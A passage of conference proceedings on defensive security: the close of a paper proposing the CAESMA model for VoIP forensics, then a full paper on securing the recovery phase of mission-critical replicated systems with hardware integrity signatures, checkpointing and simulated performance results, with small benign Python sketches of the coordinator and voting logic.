The current trend of widespread VoIP use makes it indispensable for forensic investigators to have the necessary tools to study and prevent all possible vulnerability threats in communications.

According to the investigation made in this paper, the tools potentially applicable to this problem are the REN-JIN and CALEA models. Both were conceived as network forensic models, and neither is fully adequate for evidence collection in VoIP communications, given the special parameters of the evidence that allow network forensic investigators to identify and capture specific data about the crime.


In this sense, the new CAESMA model is proposed, which appears to cover the shortcomings noted in the forensic models previously mentioned, meeting all the steps necessary for proper VoIP forensic analysis, as established in the DFRWS general model.

In conclusion, the CAESMA model offers a robust network forensic system for identification, preservation, collection, examination, analysis and presentation of information concerning VoIP traffic, which ultimately will provide valid evidence for adequate use by judicial authorities.

7. Future work

Based on the comparative analysis completed in this work and the preliminary presentation of the CAESMA model, the next step is to develop this new forensic model and validate it for adequate VoIP network analysis.

8. Annex 1

Tree of Trouble

Tree of Objectives

Acknowledgements

To Juan C. Pelaez from the U.S. Army Research Laboratory, USA, for his collaboration and for supplying us with updated working material.

To Juergen Rochol and Liane M. Rockenbach Tarouco from UFRGS, RS-Brazil, for their state-of-the-art documentation.

References

DFRWS: Digital Forensics Research Workshop. (2001) "A Road Map for Digital Forensics Research", 6 November, http://www.dfrws.org/2001/dfrws-rm-final.pdf
IETF: Internet Engineering Task Force. (2004) "RFC 3761: The E.164 to URI DDDS Application (ENUM)", http://www.ietf.org/rfc/rfc3761.txt
ITU: International Telecommunication Union. (2005) "Recommendation H.248.1", http://www.itu.int/rec/T-REC-H.248.1-200509-I/en
Fernandez, E., Pelaez, J. and Larrondo-Petrie, M. (2007) "Security Patterns for Voice over IP Networks", Journal of Software, Vol. 2, No. 2, August.
Moore, T., Meehan, A., Manes, G. and Shenoi, S. (2005) "Using Signaling Information in Telecom Network Forensics", Advances in Digital Forensics: IFIP International Conference on Digital Forensics, National Center for Forensic Science, Orlando, Florida, USA.
Pelaez, J. and Fernandez, E. (2006) "Wireless VoIP Network Forensics", Fourth LACCEI International Latin American and Caribbean Conference for Engineering and Technology (LACCET'2006), Mayaguez, Puerto Rico.
Pelaez, J., Fernandez, E., Larrondo-Petrie, M. and Wieser, C. (2007) "Attack Patterns in VoIP", Florida Atlantic University, USA and University of Oulu, Finland.
Pelaez, J. and Fernandez, E. (2010) "VoIP Network Forensic Patterns", U.S. Army Research Laboratory and Florida Atlantic University, USA.
Ray, D. and Bradford, P. (2007) "Models of Models: Digital Forensics and Domain-Specific Languages", Department of Computer Science, The University of Alabama, USA.
Reith, M., Carr, C. and Gunsch, G. (2002) "An Examination of Digital Forensic Models", International Journal of Digital Evidence, Vol. 1, Issue 3, Fall.
Scoggins, S. (2004) "Security Challenges for CALEA in Voice over Packet Networks", Texas Instruments, 16 April, USA.
The Honeynet Project. (2006) "Know Your Enemy: Honeynets", http://www.honeynet.org


Secure Proactive Recovery – a Hardware Based Mission Assurance Scheme

Ruchika Mehresh 1, Shambhu Upadhyaya 1 and Kevin Kwiat 2
1 State University of New York at Buffalo, USA
2 Air Force Research Laboratory, Rome, USA
rmehresh@buffalo.edu
shambhu@buffalo.edu
kwiatk@rl.af.mil

Abstract: Mission assurance in critical systems entails both fault tolerance and security. Since fault tolerance via redundancy or replication is contradictory to the notion of a limited trusted computing base, normal security techniques cannot be applied to fault tolerant systems. Thus, in order to enhance the dependability of mission critical systems, designers employ a multi-phase approach that includes fault/threat avoidance/prevention, detection and recovery. The detection phase is the fallback plan for the avoidance/prevention phase, just as the recovery phase is the fallback plan for the detection phase. However, despite this three-stage barrier, a determined adversary can still defeat system security by staging an attack on the recovery phase. Since recovery is the final stage of the dependability life-cycle, unless certain security methodologies are used, full assurance of mission critical operations cannot be guaranteed. For this reason, we propose a new methodology, viz. secure proactive recovery, that can be built into future mission-critical systems in order to secure the recovery phase at low cost. The proposed solution is realized through a hardware-supported design of a consensus protocol. One of the major strengths of this scheme is that it not only detects abnormal behavior due to system faults or attacks, but also secures the system in the case where a smart attacker attempts to camouflage himself by playing along with the predefined protocols. This sort of adversary may compromise certain system nodes at some earlier stage but remain dormant until the critical phase of the mission is reached; we call such an adversary the Quiet Invader. In an effort to minimize overhead, enhance performance and tamper-proof our scheme, we employ redundant hardware typically found in today's self-testing processor ICs, such as design for testability (DFT) and built-in self-test (BIST) logic. The cost and performance analysis presented in this paper validates the feasibility and efficiency of our solution.

Keywords: security, fault tolerance, mission assurance, critical systems, hardware

1. Introduction

Research in the past several decades has seen significant maturity in the field of fault tolerance. However, fault tolerant systems still require multi-phased security due to the lack of a strong trusted computing base. The first phase in this regard is avoidance/prevention, which consists of proactive measures to reduce the probability of faults or attacks; this can be achieved via advanced design methodologies such as encryption. The second phase, detection, consisting primarily of an intrusion detection system, attempts to detect the faults and malicious attacks that occur despite the preventive measures. The final phase is recovery, which focuses on recuperating the system after the occurrence of an attack or fault. Generally, fault tolerant systems rely on replication and redundancy for fault-masking and system recovery.

These three layers of security provide a strong defense for mission critical systems. Yet, if a determined adversary stages an attack on the recovery phase of an application, it is quite possible that the mission will fail for lack of any further countermeasures. Therefore, these systems need another layer of defense to address attacks that may be mounted by malicious opponents during the recovery phase itself.

The quiet invader is another serious threat that we consider. Attacking the mission in its critical phase not only leaves the defender with less time to respond; cancelling the mission at this late stage is also far more expensive than cancelling it at some earlier stage. If the defender is not left with enough time to respond to the attack, the result can be major economic loss and even fatalities.

We develop a framework for mission-assured recovery using the concept of runtime node-to-node verification, implementable in low-level hardware that is not accessible to the adversary. The rationale behind this approach is that if an adversary can compromise a node by gaining root privilege over user-space components, any solution developed in user space will not be effective, since such solutions may not remain secure and tamper-resistant. In our scheme, the entire verification process can be carried out in a manner that is oblivious to the adversary, which gives the system an additional


advantage. We explore the potential of utilizing the test logic on the processors (hence the name "hardware-based mission assurance scheme") for implementing our secure proactive recovery paradigm. This choice makes our solution extremely cost effective. To establish the proof-of-concept for this proposal, we consider a simple mission critical system architecture that uses majority consensus for diagnosis and recovery. Finally, we analyze the security, usability and performance overhead of this scheme.

2. Related work

The solutions proposed in the literature to address faults and attacks in fault tolerant systems employ redundancy, replication and consensus protocols. They are able to tolerate the failure of up to f replicas. However, given enough time and resources, an attacker can compromise more than f replicas and subvert the system. A combination of reactive and proactive recovery approaches can be used to keep the number of compromised replicas under f at all times (Sousa et al. 2007). However, as attacks become more complex, it becomes harder to detect faulty or malicious behavior (Wagner and Soto 2002). Moreover, if one replica is compromised, the adversary holds the key to the other replicas too. To counter this problem, researchers have proposed spatial diversity in software. Spatial diversity can slow down an adversary, but eventually the compromise of all diverse replicas is possible. It was therefore further proposed to introduce time diversity along with spatial diversity. Time diversity modifies the state of the recovered system (OS access passwords, open ports, authentication methods, etc.), to ensure that an attacker is unable to exploit the same vulnerabilities that he had exploited before (Bessani et al. 2008).
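The time-diversity idea can be sketched as a rejuvenation routine that draws a fresh configuration on every recovery, so a previously learned state is unlikely to recur. The configuration fields below are our illustrative stand-ins for the state elements mentioned above (passwords, open ports, authentication methods), not an actual implementation from the literature:

```python
import random
import secrets

def rejuvenate(seed=None):
    """Return a fresh, randomized replica configuration on each recovery."""
    rng = random.Random(seed)
    return {
        "admin_password": secrets.token_hex(16),            # new OS access secret
        "open_port": rng.randint(20000, 60000),             # service moves ports
        "auth_method": rng.choice(["cert", "otp", "psk"]),  # rotate auth scheme
    }

a, b = rejuvenate(), rejuvenate()
# Two recovered states should almost surely differ, denying the attacker
# the chance to reuse previously discovered knowledge.
print(a["admin_password"] != b["admin_password"])  # True
```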

3. Threat model

We developed an extensive threat model to analyze security logically in a wide range of scenarios. Assume that we have n replicas in a mission-critical application and that the system can tolerate the failure of up to f replicas during the entire mission.

Scenario 1: Attacks on Byzantine fault-tolerant protocols

Assume that no design diversity is introduced in the replicated system. During the mission lifetime, an adversary can easily compromise f+1 identical replicas and bring down the system.
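The threshold arithmetic underlying these scenarios can be stated directly: with n replicas tolerating up to f faults, the adversary wins once f+1 replicas are under his control. The helper below is our illustration; the n >= 3f+1 sizing in the comment is the usual Byzantine fault-tolerance requirement, not a claim from this paper.

```python
def system_subverted(n: int, f: int, compromised: int) -> bool:
    """A system that tolerates up to f faulty replicas out of n is
    subverted once the adversary controls f + 1 of them."""
    assert 0 <= compromised <= n
    return compromised >= f + 1

# With n = 4 replicas tolerating f = 1 fault (typical BFT sizing n >= 3f + 1):
print(system_subverted(4, 1, 1))  # False: the single fault is still masked
print(system_subverted(4, 1, 2))  # True: f + 1 replicas are compromised
```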

Scenario 2: Attacks on proactive recovery protocols

In proactive recovery, the whole system is rejuvenated periodically. However, the adversary becomes more and more knowledgeable as his attacks evolve with each successful or failed attempt, so it is only a matter of time before he is able to compromise f+1 replicas between periodic rejuvenations. Furthermore, the compromised replicas can disrupt the system's normal functioning in many ways, for example by creating extra traffic so that recovery is delayed and the adversary gains more time to compromise f+1 replicas (Sousa et al. 2007). This is a classic case of attacking the recovery phase.

Scenario 3: Attacks on proactive-reactive recovery protocols

Proactive-reactive recovery solves several major problems, except that if the compromised node is recovered by restoring the same state that was previously attacked, the attacker will already know its vulnerabilities (Sousa et al. 2007). In this case, a persistent attacker may get faster with time, or may invoke many reactive recoveries, exhausting system resources. A large number of recoveries also adversely affects system availability. This is another instance of attacking the recovery phase. Furthermore, arbitrary faults are very difficult to detect (Haeberlen et al. 2006).

Scenario 4: Attacks on proactive-reactive recovery with spatial diversity

Spatial diversity in replicas has been proposed as a relatively stronger security solution. It can be more difficult and time-consuming for the adversary to compromise f+1 diverse replicas, but compromising them all eventually remains possible, especially for long-running applications. Also, most existing systems are not spatially diverse, and introducing spatial diversity into them is expensive.

Time diversity has been suggested to complement spatial diversity so as to make it almost impossible to predict the new state of the system (Bessani et al. 2008). The complexity involved in implementing time diversity in a workable solution is very high, because it will have to deal with on-the-fly compatibility issues and much more. Besides, updating replicas and other communication protocols consumes considerable time and resources. A decent workable solution employing space diversity still needs a lot of work (Banatre et al. 2007), so employing time diversity is a step planned too far into the future.

Ruchika Mehresh et al.

Scenario 5: The quiet invader

With or without spatial diversity, an adversary may be able to investigate a few selected nodes quietly and play along with the protocol to avoid getting caught, gaining more time to understand the system. After gathering enough information, the adversary can design attacks for f+1 replicas and launch them all at once when he is ready or when the mission enters a critical stage. If these attacks are not detected or dealt with in time, the system fails. This is an evasive attack strategy for subverting the detection and recovery phases. Similar threat models have been discussed in the literature previously (Todd et al. 2007, Del Carlo 2003).

Scenario 6: The physical access threat

Sometimes system nodes are deployed in an environment where physical access to them is a highly probable threat. For instance, in a wireless sensor network deployment, sensor nodes are highly susceptible to physical capture. To prevent such attacks, we need to capture any changes in the physical environment of a node. A reasonable solution may involve attaching motion sensors to each node; any unexpected readings from these sensors indicate a possible threat, and our scheme can then be used to assure the mission.

4. System design

4.1 Assumptions

We work with a simplified, centralized architecture of a mission-critical application in order to describe and evaluate the proposed scheme. No spatial or time diversity is assumed, though our scheme will work with any kind of diversity.

The network can lose, duplicate or reorder messages but is immune to partitioning. The coordinator (central authority and trusted computing base) is responsible for periodic checkpointing in order to maintain a consistent global state. The stable storage at the coordinator holds the recovery data through all the tolerated failures and their corresponding recoveries. We assume sequential and equidistant checkpointing (Elnozahy et al. 2002).

The replicas are assumed to be running on identical hardware platforms. Each node has an advanced CPU (central processing unit) and memory subsystem, along with the test logic (in the form of DFT and BIST) that is generally used for manufacturing test; refer to Figure 1(a). All the chips comply with the IEEE 1149.1 JTAG standard (Abramovici and Stroud 2001). Figure 1(b) elaborates the test logic and boundary scan cells corresponding to the assumed hardware.

We assume a software tripwire running on each replica that can be used to detect a variety of anomalies at the host. By instrumenting the openly available tripwire source code (Hrivnak 2002), we can direct the intrusion alert to a set of system registers using low-level code. The triggered and latched hardware signature will be read out by taking a snapshot of the system registers using the "scan-out" mode of the observation logic associated with the DFT hardware. The bit pattern will be brought out to the CPU ports using the IEEE 1149.1 JTAG instruction set in a tamper-resistant manner. Once it is brought out of the chip, it will be securely sent to the coordinator for verification and further action. This way, the system is able to surreptitiously diagnose the adversary's actions.

4.2 Conceptual basics

We present a simple and practical alternative to the spatial/time diversity solutions in order to increase the resilience of a fault-tolerant system against benign faults and malicious attacks. In particular, this addresses the threat of a quiet invader (Scenario 5 of Section 3). An adversary needs to compromise f+1 replicas out of the n correctly working replicas in order to affect the result of a majority consensus protocol and disrupt the mission.

Figure 1(a): Replicated hardware
Figure 1(b): Capturing signature

The key idea is to detect a system compromise by a smart adversary who has taken over some replicas (or has gained sufficient information about them) but is playing along in order to gain more time. From the defender's point of view, if the system knows which of the n replicas have become untrustworthy, the mission can still succeed with the help of the surviving healthy replicas. Smart attackers try to minimize the risk of getting caught by compromising only the minimum number of replicas required to subvert the entire system. Aggressive attackers can be detected clearly and easily, and their attacks recovered from. So a smart defender should detect attacks surreptitiously, so as not to make the attacker aggressive. This especially holds when a smart attacker has been hiding for long and the mission is nearing completion; at this stage, the priority is not to identify the attacker but to complete the mission securely.

The proposed scheme offers passive detection and recovery, in order to assure the adversary of his apparent success and prevent him from becoming more aggressive. At some later stage, when the adversary launches an attack to fail f+1 replicas at once, the attack fails because those replicas have already been identified and ousted from the voting process without the attacker's knowledge. In our solution, we require at least two correctly working replicas, providing a duplex system at a minimum, for the mission to succeed. The advantage of this approach is that in the worst case, where all the replicas are compromised, the system will not deliver a result rather than delivering a wrong one. This is a necessary condition for many safety-critical missions. If an adversary can compromise a replica by gaining root privilege to user-space components, any solution developed in user space will not be effective, since such solutions will not remain secure and tamper-resistant. Therefore, our paradigm achieves detection of node compromise through a verification scheme implementable in low-level hardware. We use software- or hardware-driven tripwires that help detect any ongoing suspicious activity and trigger a hardware signature indicating the integrity status of a replica. This signature is generated without affecting the application layer, and hence the attacker remains oblivious to this activity. Also, a smart attacker is not likely to monitor the system thoroughly, as that may lead to detection. The signature is then securely collected and sent to the coordinator, which performs the necessary action.

4.3 Checkpointing

In our simplified application, the checkpointing module attached to the coordinator establishes a consistent global checkpoint and also carries out the voting procedures that lead to the detection of anomalies due to faults, attacks or both.

The coordinator starts the checkpointing/voting process by broadcasting a request message to all the replicas, asking them to take checkpoints. It also initiates a local timer that runs out if the coordinator does not receive the expected number of replies within a specific time frame. On receiving this message, all the replicas pause their respective executions and take a checkpoint. These checkpoints are then sent over the network to the coordinator through a secure channel using encryption. On receiving the expected number of checkpoints, the coordinator compares them for consistency. If all checkpoints are consistent, it broadcasts a commit message that completes the two-phase checkpoint protocol. After receiving the commit message, all the replicas resume their respective executions. This is how the replicas execute in lockstep. If the timer runs out before the expected number of checkpoints is received, the coordinator sends out another request message, and all the replicas reply with their last locally stored checkpoints. In our application, we have limited the number of repeated checkpoint requests to three per non-replying replica. If a replica does not reply to three (or a threshold count of) checkpoint request messages, it is considered dead by the coordinator, and a commit message is sent to the rest of the replicas if their checkpoints are consistent. If the checkpoints are not consistent, the coordinator replies with a rollback message to all the replicas. This rollback message includes the last consistent checkpoint stored on the stable storage at the coordinator, and all the replicas return to the previous state of execution it defines. If a certain replica fails to deliver a consistent checkpoint and causes more than three (or a threshold count of) consecutive rollbacks, the fault is considered permanent and the replica is excluded from the system.
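The coordinator's control flow described above can be sketched as follows. This is a minimal single-round model, not the authors' Java prototype: replicas are modelled as callables that return a checkpoint value or None (no reply), and transport, encryption and the timer mechanics are elided.

```python
MAX_REQUESTS = 3    # repeated checkpoint requests per non-replying replica
MAX_ROLLBACKS = 3   # consecutive rollbacks tolerated before exclusion


def checkpoint_round(replicas, last_committed, rollback_counts):
    """One two-phase checkpoint round; returns ('commit'|'rollback', state)."""
    checkpoints = {}
    for name, poll in replicas.items():
        # Re-send the request up to MAX_REQUESTS times; a replica that
        # never answers is treated as dead and ignored for this round.
        for _ in range(MAX_REQUESTS):
            reply = poll()
            if reply is not None:
                checkpoints[name] = reply
                break

    if not checkpoints:
        return "rollback", last_committed

    if len(set(checkpoints.values())) == 1:
        # Consistent: broadcast commit, completing the two-phase protocol.
        for name in checkpoints:
            rollback_counts[name] = 0
        return "commit", next(iter(checkpoints.values()))

    # Inconsistent: roll everyone back to the last consistent checkpoint
    # and count the rollback against the minority (suspect) replicas.
    majority = max(set(checkpoints.values()),
                   key=lambda v: sum(1 for c in checkpoints.values() if c == v))
    for name, ckpt in list(checkpoints.items()):
        if ckpt != majority:
            rollback_counts[name] = rollback_counts.get(name, 0) + 1
            if rollback_counts[name] > MAX_ROLLBACKS:
                del replicas[name]   # fault considered permanent
    return "rollback", last_committed
```

A replica whose rollback count exceeds the threshold is dropped from the replica set, mirroring the permanent-fault rule above.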

A hardware signature is generated at each replica and piggybacked on the checkpoint when it is sent to the coordinator. This signature quantifies the integrity status of the replica since the last successful checkpoint. For simplicity, we use the values all-0s (for an uncompromised replica) and all-1s (for a compromised replica). A host-based intrusion detection sensor at each replica is responsible for generating these signatures. If the coordinator finds any hardware signature to be all-1s, the corresponding replica is blacklisted and any of its future results/checkpoints are ignored at the coordinator. However, the coordinator continues normal communication with the blacklisted replica to keep the attacker unaware of this discovery.

Finally, the results from all the non-blacklisted replicas are voted upon by the coordinator for the final result.
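The blacklist-then-vote step can be illustrated with a small sketch. The 32-bit all-0s/all-1s encoding follows the simplification above; the replica names, results and function shape are hypothetical.

```python
ALL_ZEROS = "0" * 32   # signature of an uncompromised replica
ALL_ONES = "1" * 32    # signature latched after a tripwire alarm


def vote(reports, blacklist):
    """Blacklist replicas whose piggybacked signature is all-1s, then
    majority-vote over the results of the remaining replicas.
    `reports` maps replica name -> (hardware_signature, result)."""
    for name, (signature, _result) in reports.items():
        if signature == ALL_ONES:
            blacklist.add(name)   # ignored from now on, but the coordinator
                                  # keeps talking to it so the attacker sees
                                  # no change in behavior
    tally = {}
    for name, (_signature, result) in reports.items():
        if name not in blacklist:
            tally[result] = tally.get(result, 0) + 1
    return max(tally, key=tally.get)
```

With two healthy replicas reporting 42 and one compromised replica reporting 99, the compromised replica is silently excluded and the vote still yields 42.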

4.4 Using built-in test logic for hardware signature generation and propagation

As described under the assumptions, the system uses a software-driven tripwire that monitors the system continuously for a specified range of anomalies. The tripwire raises an alarm on anomaly detection by setting the value of a designated system register to all-1s (it is all-0s otherwise). This value then becomes the integrity status indicator for the replica and is read out using the scan-out mode of the test logic. It is then securely sent to the coordinator for verification.

5. Performance analysis<br />

Most of the mission critical military applications that employ checkpointing or proactive security tend to<br />

be long running ones. For instance, a rocket launch countdown running for hours/days. Therefore, our<br />

performance analysis will focus on long running applications and their overall execution time.<br />

Since our scheme employs built-in hardware for implementing security, and security-related notifications piggyback on the checkpointing messages, our security comes nearly free for systems that already use checkpointing for fault tolerance. However, many legacy systems that do not use checkpointing will need to employ it before they can benefit from our scheme. In such cases, the cost of checkpointing is also included in the cost of employing our security scheme. To cover all these possibilities, we consider the following three cases.

Case 1: This case includes all the mission-critical legacy systems that do not employ checkpointing or security.

Case 2: This case examines mission-critical systems that employ checkpointing as a safety measure in the absence of any failures or attacks. Note that this is the worst-case scenario for Case 1 systems that may adopt our scheme, because there are practically no faults/attacks. Also, our security scheme is nearly free for Case 2 systems, if they choose to employ it.

Case 3: The systems considered under Case 3 employ checkpointing and our proposed security scheme (hardware signature verification). This case considers the occurrence of failures and security-related attacks.

These three cases allow us to study the cost of adopting our security scheme in all possible scenarios.

Since the proposed system is composed of both hardware and software subsystems, we could not use one standard simulation engine to simulate the entire application accurately and obtain data. Therefore, we combined the results obtained from individually simulating the software and the hardware components using our multi-step simulation approach (Mehresh et al. 2010).

5.1 Simplified system prototype development<br />

Figure 2 shows the modular design of the simplified system for mission critical applications with n<br />

replicas. The coordinator is the core of this centralized replicated system. It is responsible for voting<br />

operations on intermediate results, integrity signatures and checkpoints obtained from the replicas.<br />

The heartbeat manager broadcasts periodic ping messages to determine if the nodes are alive. The<br />

replicas are identical copies of the workload executing in parallel in lockstep.<br />

Figure 2: Overall system design<br />

5.2 Multi-step simulation approach

We use a multi-step simulation approach to evaluate the system performance for the three cases. This new approach is required because there are currently no benchmarks for evaluating such systems. A combination of pilot system implementation and simulation is used to obtain more realistic and statistically accurate results.

The components of this evaluation include a Java implementation based on Chameleon ARMORs (Kalbarczyk et al. 1999), ARENA simulation (http://www.arenasimulation.com/) and Cadence simulation (http://www.cadence.com). ARENA is a discrete-event simulator and models the given system at a high level of abstraction. The lower levels of abstraction that become too complex to model are parameterized using data obtained from experiments with the Java system prototype. Another reason for using the ARENA simulator is the analysis of long-running mission-critical applications; such an analysis with real-time experiments would be inefficient and extremely time-consuming. The Java prototype uses socket programming across a network of 100 Mbps bandwidth. The experiments for measuring performance were conducted on a Windows platform with an Intel Core Duo 2 GHz processor and 2 GB RAM. Cadence simulation is primarily used for the feasibility study of the proposed hardware scheme. To verify the precision of our simulators, test cases were developed and deployed for the known cases of operation.

This system accepts workloads from the user and executes them in a fault-tolerant environment. We used the Java SciMark 2.0 workloads as user inputs in this system prototype. The four workloads are: Fast Fourier Transform (FFT), Jacobi Successive Over-relaxation (SOR), Sparse Matrix Multiplication (Sparse) and Dense LU Matrix Factorization (LU). The standard large data sets (http://math.nist.gov/scimark2) were used.

Data sets from short-running replicated experiments were collected, and fitted probability distributions were obtained using the ARENA input data analyzer. These distributions defined the stochastic parameters for the ARENA simulation model.

We examine the feasibility of the hardware component of this architecture (as described under the assumptions) as follows. The integrity signature of a replica is stored in the flip-flops of the boundary scan chain around a processor. This part of our simulation is centered on a boundary-scan-inserted DLX processor (Patterson and Hennessy 1994). Verilog code for the boundary-scan-inserted DLX processor is elaborated in the Cadence RTL Compiler. To load the signature into the scan cells, a multiplexer is inserted before each cell, with the test data input (TDI) as one input and the corresponding bit of the 32-bit signature vector as the other. Depending on the select line, either the test data or the signature is latched into the flip-flops of the scan cells. To read the signature out, the bits are serially shifted from the flip-flops onto the output bus.
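The modified scan chain can be modelled behaviourally in a few lines of Python. This is a stand-in for the Verilog just described, not the actual RTL; the chain length and bit ordering are illustrative assumptions.

```python
def scan_out(signature_bits, tdi_bits, load_signature):
    """Model of the modified boundary-scan chain: a multiplexer in front
    of each scan cell latches either the external test data (TDI) or one
    bit of the integrity signature, selected by `load_signature`; the
    chain is then serially shifted out, last cell first."""
    # Parallel load: the mux select line picks signature or test data.
    cells = list(signature_bits if load_signature else tdi_bits)
    out = []
    while cells:                 # one bit per clock onto the output bus
        out.append(cells.pop())
    return "".join(out)
```

For a 4-bit chain, `scan_out("1100", "0000", True)` shifts the signature out in reverse cell order, yielding "0011", while deasserting the select line passes the test data through instead.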

5.3 Results

We analyze the prototype system for the three cases described earlier. Since we want to evaluate the performance of this system in the worst-case scenario, where the checkpointing overhead is maximum, we choose sequential checkpointing (Elnozahy et al. 2002). For the following analysis (unless mentioned otherwise), the checkpoint interval is assumed to be 1 hour. Table 1 presents the execution times for the four SciMark workloads; the values are plotted in Figure 3 on a logarithmic scale. We can see that the execution time overhead increases only a little when the system shifts from Case 1 to Case 2 (i.e., employing our scheme as a preventive measure). However, the overhead increases rapidly when the system moves from Case 2 to Case 3. The execution overhead increases substantially only if many faults are present, in which case it is worth the fault tolerance and security that come along. As the values in Table 1 show, an application that runs for 13.6562 hours incurs an execution time overhead of only 13.49 minutes in moving from Case 1 to Case 2.
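The Case 1 to Case 2 overhead quoted above can be checked directly against the Table 1 values:

```python
# Execution times (hours) transcribed from Table 1.
case1 = {"FFT": 3421.09, "LU": 222.69, "SOR": 13.6562, "Sparse": 23.9479}
case2 = {"FFT": 3477.46, "LU": 226.36, "SOR": 13.8811, "Sparse": 24.3426}

# Every workload pays roughly the same relative preventive cost (~1.65%).
overheads = {w: 100 * (case2[w] - case1[w]) / case1[w] for w in case1}

# The 13.6562-hour SOR run grows by about 13.49 minutes, as stated above.
sor_overhead_minutes = (case2["SOR"] - case1["SOR"]) * 60
```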

Figure 3: Execution times for SciMark workloads across three cases, on a logarithmic scale

Figure 4 shows the percentage increase in execution times of the workloads when the system upgrades from a lower case to a higher one. It is assumed that these workload executions have no interactions (inputs/outputs) with the external environment. The percentage increase in execution time for all the workloads when the system upgrades from Case 1 to Case 2 is only around 1.6%. An upgrade from Case 1 to Case 3 (with mean time to fault M = 10) is around 9%. These percentages indicate acceptable overheads.

Table 1: Execution times (in hours) for the SciMark workloads across three cases

                 FFT        LU        SOR       Sparse
Case 1           3421.09    222.69    13.6562   23.9479
Case 2           3477.46    226.36    13.8811   24.3426
Case 3 (M=10)    3824.63    249.08    15.2026   26.7313
Case 3 (M=25)    3593.39    233.83    13.8811   24.3426

Figure 4: Percentage execution time overheads incurred by the SciMark workloads while shifting between cases

As Table 1 shows, for a checkpoint interval of 1 hour and M = 10, the workload LU executes for approximately 10 days. Figure 5 shows the effect of increasing the checkpoint interval for workload LU at different values of M ranging from 5 to 25. The optimal checkpoint interval values (and the corresponding execution times) for the plots in Figure 5 are provided in Table 2.

Figure 5: Effect of checkpoint interval on workload execution times at different values of M

Note that we used the multi-step approach for this simulation, and the parameters for the simulation model were derived from experimentation. Therefore, these results do not just represent data trends but are also close to the statistically expected real-world values.
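The optimal intervals in Table 2 come from the ARENA simulation, but their trend (longer intervals as faults become rarer) agrees with the classic first-order estimate for the optimal checkpoint interval, sqrt(2·C·M), where C is the per-checkpoint overhead. The value of C below is purely an assumed figure for illustration, not a parameter reported in this paper:

```python
import math


def first_order_interval(checkpoint_cost_hours, mtbf_hours):
    """Classic first-order optimum: interval = sqrt(2 * C * M). A rough
    closed-form guide only; the simulation-derived optima in Table 2
    need not coincide with it."""
    return math.sqrt(2 * checkpoint_cost_hours * mtbf_hours)


# With an assumed C of 0.01 h (36 s), M = 10 gives about 0.45 h, the same
# order of magnitude as the 0.5 h simulated optimum in Table 2.
estimate = first_order_interval(0.01, 10)
```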


Table 2: Approximate optimal checkpoint interval values and their corresponding workload execution times for LU (Case 3) at different values of M

                                       M=5      M=10     M=15     M=25
Optimal checkpoint interval (hours)    0.3      0.5      0.65     0.95
Execution time (hours)                 248.97   241.57   238.16   235.06

6. Conclusion

This paper proposes a hardware-based proactive solution to secure the recovery phase of mission-critical applications. A detailed threat model is developed to analyze the security provided by our scheme. The biggest strengths of this research are its ability to deal with smart adversaries, its priority on mission assurance, and its use of redundant hardware to capture the integrity status of a replica outside the user space. Since this scheme is simple and has no visible application-specific dependencies, its implementation has the potential to be application-transparent. For performance evaluation, we investigated a simplified mission-critical application prototype using a multi-step simulation approach. We plan to extend the centralized architecture to a distributed system in future research work.

We defined cases to investigate the cost involved in applying our security scheme to all kinds of systems (including legacy systems with no fault tolerance). The performance evaluation showed promising results, and the cost/performance overhead is only a small percentage of the original execution time when faults are absent. As the rate of fault occurrence increases, the overhead increases too, but this additional overhead comes with fault tolerance and security. Overall, we believe that our solution provides strong security at low cost for mission-critical applications.

Acknowledgments

This work was supported in part by ITT Grant No. 200821J. This paper has been approved for Public Release; Distribution Unlimited: 88ABW-2010-6094 dated 16 Nov 2010.

References

Abramovici, M. and Stroud, C.E. (2001) "BIST-based test and diagnosis of FPGA logic blocks", IEEE Transactions on VLSI Systems, volume 9, number 1, pages 159-172, February.

Banatre, M., Pataricza, A., Moorsel, A., Palanque, P. and Strigini, L. (2007) From resilience-building to resilience-scaling technologies: Directions – ReSIST, NoE Deliverable D13. DI/FCUL TR 07-28, Dept. of Informatics, Univ. of Lisbon, November.

Bessani, A., Reiser, H.P., Sousa, P., Gashi, I., Stankovic, V., Distler, T., Kapitza, R., Daidone, A. and Obelheiro, R. (2008) "FOREVER: Fault/intrusiOn REmoVal through Evolution & Recovery", Proceedings of the ACM Middleware'08 companion, December.

Del Carlo, C. (2003) Intrusion detection evasion, SANS Institute InfoSec Reading Room, May.

Elnozahy, E.N., Alvisi, L., Wang, Y. and Johnson, D.B. (2002) "A survey of rollback-recovery protocols in message-passing systems", ACM Computing Surveys (CSUR), volume 34, number 3, pages 375-408, September.

Haeberlen, A., Kouznetsov, P. and Druschel, P. (2006) "The case for Byzantine fault detection", Proceedings of the 2nd conference on Hot Topics in System Dependability, volume 2, November.

Hrivnak, A. (2002) Host Based Intrusion Detection: An Overview of Tripwire and Intruder Alert, SANS Institute InfoSec Reading Room, January.

Kalbarczyk, Z., Iyer, R.K., Bagchi, S. and Whisnant, K. (1999) "Chameleon: a software infrastructure for adaptive fault tolerance", IEEE Transactions on Parallel and Distributed Systems, volume 10, number 6, pages 560-579, June.

Mehresh, R., Upadhyaya, S. and Kwiat, K. (2010) "A Multi-Step Simulation Approach Toward Fault Tolerant System Evaluation", Third International Workshop on Dependable Network Computing and Mobile Systems, October.

Patterson, D. and Hennessy, J. (1994) Computer Organization and Design: The Hardware/Software Interface, Morgan Kaufmann.

Sousa, P., Bessani, A., Correia, M., Neves, N.F. and Verissimo, P. (2007) "Resilient intrusion tolerance through proactive and reactive recovery", Proceedings of the 13th IEEE Pacific Rim International Symposium on Dependable Computing, pages 373-380, December.

Todd, A.D., Raines, R.A., Baldwin, R.O., Mullins, B.E. and Rogers, S.K. (2007) "Alert Verification Evasion Through Server Response Forging", Proceedings of the 10th International Symposium, RAID, pages 256-275, September.

Wagner, D. and Soto, P. (2002) "Mimicry attacks on host-based intrusion detection systems", Proceedings of the 9th ACM conference on Computer and communications security, November.



Identifying Cyber Espionage: Towards a Synthesis Approach

David Merritt and Barry Mullins
Air Force Institute of Technology, Wright Patterson Air Force Base, Ohio, USA
david.merritt@afit.edu
barry.mullins@afit.edu

